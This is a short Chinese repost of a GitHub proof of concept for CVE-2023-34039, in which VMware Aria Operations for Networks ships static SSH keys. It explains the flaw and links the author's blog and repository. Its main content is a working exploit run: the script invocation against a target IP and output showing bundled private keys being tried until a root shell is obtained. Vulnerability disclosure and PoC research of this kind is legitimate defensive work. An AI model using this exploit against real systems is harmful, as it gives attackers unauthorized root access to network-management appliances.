POC来源于Github请在虚拟环境中,进行使用。
CVE-2023-34039 VMWare Aria Operations for Networks (vRealize Network Insight) 的 POC 静态 SSH 密钥 RCE
该漏洞的根本原因分析可以在我的博客上找到:
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/
VMWare Aria Operations for Networks (vRealize Network Insight) 从版本 6.0 到 6.10 不会为 和support用户重新生成 ssh 密钥ubuntu,从而允许具有 SSH 访问权限的攻击者获得root对此产品的 shell 访问权限。
ProjectDiscovery Research的Harsh Jaiswal (@rootxharsh) 和Rahul Maini (@iamnoooob)向 VMWare 报告了此问题
我刚刚编写了这个漏洞利用程序(如果你可以这样称呼它的话),因为它基本上是一个 ssh 命令包装器。
python CVE-2023-34039.py --target 192.168.1.16(!) VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)(*) Exploit by Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_collector(*) Trying key: keys/vrni-6.2.0/id_rsa_vnera_keypair_6.2.0_platform(*) Trying key: keys/vrni-6.10.0/id_rsa_vnera_keypair_6.10.0_platform********************************** ATTENTION **********************************NTP Service is not healthy.IMPACT: It may affect the proper working of other services.ACTION: Restore the service using 'ntp' CLI command.********************************** ATTENTION **********************************[email protected]:~$ sudo -i[email protected]:~# iduid=0(root) gid=0(root) groups=0(root)[email protected]:~# hostnamevrni-platform-release[email protected]:~#
项目地址:
https://github.com/sinsinology/CVE-2023-34039
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里